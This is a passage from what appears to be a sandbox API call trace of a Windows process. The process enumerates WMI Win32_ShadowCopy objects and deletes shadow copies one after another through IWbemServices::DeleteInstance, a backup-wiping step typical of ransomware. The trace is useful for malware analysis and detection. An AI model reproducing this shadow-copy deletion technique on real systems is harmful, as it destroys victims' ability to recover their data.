[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0141.107] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0141.107] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0141.107] IUnknown:Release (This=0x142498) returned 0x1 [0141.108] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be5a310) returned 0x0 [0141.108] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be5a310, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0141.109] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be5a310, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be533d0) returned 0x0 [0141.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be533d0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be533d0) returned 0x0 [0141.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be533d0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0141.109] WbemDefPath:IUnknown:AddRef (This=0x1be533d0) returned 0x3 [0141.109] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0141.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be533d0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b9373e0) returned 0x0 [0141.110] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b9373e0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0141.110] WbemDefPath:IUnknown:Release (This=0x1b9373e0) returned 0x3 [0141.110] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0141.110] WbemDefPath:IUnknown:AddRef (This=0x1be533d0) returned 0x4 [0141.110] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be533d0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0141.110] WbemDefPath:IUnknown:Release (This=0x1be533d0) returned 0x3 [0141.110] WbemDefPath:IUnknown:Release (This=0x1be533d0) returned 0x2 [0141.110] WbemDefPath:IUnknown:Release (This=0x1be5a310) returned 0x0 [0141.111] WbemDefPath:IUnknown:Release (This=0x1be533d0) returned 0x1 [0141.111] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0141.111] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0141.111] WbemDefPath:IUnknown:AddRef (This=0x1be533d0) returned 0x2 [0141.111] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be533d0, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be533d0) returned 0x0 [0141.111] WbemDefPath:IUnknown:Release (This=0x1be533d0) returned 0x2 [0141.111] WbemDefPath:IUnknown:Release (This=0x1be533d0) returned 0x1 [0141.111] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0141.111] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0141.111] WbemDefPath:IUnknown:AddRef (This=0x1be533d0) returned 0x2 [0141.111] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be533d0, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be533d0) returned 0x0 [0141.112] WbemDefPath:IUnknown:Release (This=0x1be533d0) returned 0x2 [0141.112] WbemDefPath:IUnknown:AddRef (This=0x1be533d0) returned 0x3 [0141.112] WbemDefPath:IWbemPath:SetText (This=0x1be533d0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"") returned 0x0 [0141.112] WbemDefPath:IUnknown:Release (This=0x1be533d0) returned 0x2 [0141.112] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0141.112] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0141.113] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0141.113] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0141.113] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0141.113] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0141.113] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0141.113] SysStringLen (param_1="root\\cimv2") returned 0xa [0141.113] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0141.113] SysStringLen (param_1="root\\cimv2") returned 0xa [0141.113] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0141.113] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0141.113] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0141.113] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0141.113] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0141.114] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0141.114] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0141.114] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be533d0, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0141.114] WbemDefPath:IWbemPath:GetText (in: This=0x1be533d0, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0141.114] WbemDefPath:IWbemPath:GetText (in: This=0x1be533d0, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"") returned 0x0 [0141.114] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0141.114] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0141.114] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0141.114] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0141.114] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0141.114] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0141.114] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0141.115] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0141.115] IWbemClassObject:Get (in: This=0x1be5ff20, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0141.115] WbemDefPath:IWbemPath:GetText (in: This=0x1be533d0, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0141.115] WbemDefPath:IWbemPath:GetText (in: This=0x1be533d0, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"") returned 0x0 [0141.115] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{3DBBFF70-A67F-4333-8498-31E7BC089E0F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0142.268] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0142.268] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be601d0, puReturned=0x1c90de18*=0x1) returned 0x0 [0142.270] IUnknown:QueryInterface (in: This=0x1be601d0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be601d0) returned 0x0 [0142.270] IUnknown:QueryInterface (in: This=0x1be601d0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0142.270] IUnknown:QueryInterface (in: This=0x1be601d0, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0142.271] IUnknown:AddRef (This=0x1be601d0) returned 0x3 [0142.271] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0142.271] IUnknown:QueryInterface (in: This=0x1be601d0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be601d8) returned 0x0 [0142.271] IMarshal:GetUnmarshalClass (in: This=0x1be601d8, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0142.271] IUnknown:Release (This=0x1be601d8) returned 0x3 [0142.272] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0142.272] IUnknown:AddRef (This=0x1be601d0) returned 0x4 [0142.272] IUnknown:QueryInterface (in: This=0x1be601d0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0142.272] IUnknown:Release (This=0x1be601d0) returned 0x3 [0142.272] IUnknown:Release (This=0x1be601d0) returned 0x2 [0142.272] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0142.272] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0142.272] IUnknown:AddRef (This=0x1be601d0) returned 0x3 [0142.272] IUnknown:QueryInterface (in: This=0x1be601d0, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be601d0) returned 0x0 [0142.273] IUnknown:Release (This=0x1be601d0) returned 0x3 [0142.273] IUnknown:Release (This=0x1be601d0) returned 0x2 [0142.273] IUnknown:Release (This=0x1be601d0) returned 0x1 [0142.273] CoTaskMemFree (pv=0x16a900) [0142.273] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0142.273] IUnknown:AddRef (This=0x1be601d0) returned 0x2 [0142.273] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0142.273] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0142.273] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"") returned 0x53 [0142.273] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0142.273] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0142.274] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0142.274] IUnknown:Release (This=0x142498) returned 0x1 [0142.274] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be5a3d0) returned 0x0 [0142.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be5a3d0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0142.275] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be5a3d0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be53490) returned 0x0 [0142.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53490, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be53490) returned 0x0 [0142.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53490, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0142.275] WbemDefPath:IUnknown:AddRef (This=0x1be53490) returned 0x3 [0142.275] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0142.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53490, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b9374e0) returned 0x0 [0142.276] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b9374e0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0142.276] WbemDefPath:IUnknown:Release (This=0x1b9374e0) returned 0x3 [0142.276] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0142.276] WbemDefPath:IUnknown:AddRef (This=0x1be53490) returned 0x4 [0142.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53490, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0142.276] WbemDefPath:IUnknown:Release (This=0x1be53490) returned 0x3 [0142.276] WbemDefPath:IUnknown:Release (This=0x1be53490) returned 0x2 [0142.277] WbemDefPath:IUnknown:Release (This=0x1be5a3d0) returned 0x0 [0142.277] WbemDefPath:IUnknown:Release (This=0x1be53490) returned 0x1 [0142.277] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0142.277] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0142.277] WbemDefPath:IUnknown:AddRef (This=0x1be53490) returned 0x2 [0142.277] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53490, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be53490) returned 0x0 [0142.278] WbemDefPath:IUnknown:Release (This=0x1be53490) returned 0x2 [0142.278] WbemDefPath:IUnknown:Release (This=0x1be53490) returned 0x1 [0142.278] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0142.278] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0142.278] WbemDefPath:IUnknown:AddRef (This=0x1be53490) returned 0x2 [0142.278] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be53490, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be53490) returned 0x0 [0142.278] WbemDefPath:IUnknown:Release (This=0x1be53490) returned 0x2 [0142.279] WbemDefPath:IUnknown:AddRef (This=0x1be53490) returned 0x3 [0142.279] WbemDefPath:IWbemPath:SetText (This=0x1be53490, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1924CB9A-2919-4442-A6C0-E60362A636CF}\"") returned 0x0 [0142.279] WbemDefPath:IUnknown:Release (This=0x1be53490) returned 0x2 [0142.279] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0142.279] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0142.279] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0142.279] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0142.279] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0142.279] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0142.280] IWbemClassObject:Get (in: This=0x1be601d0, wszName="__NAMESPACE", 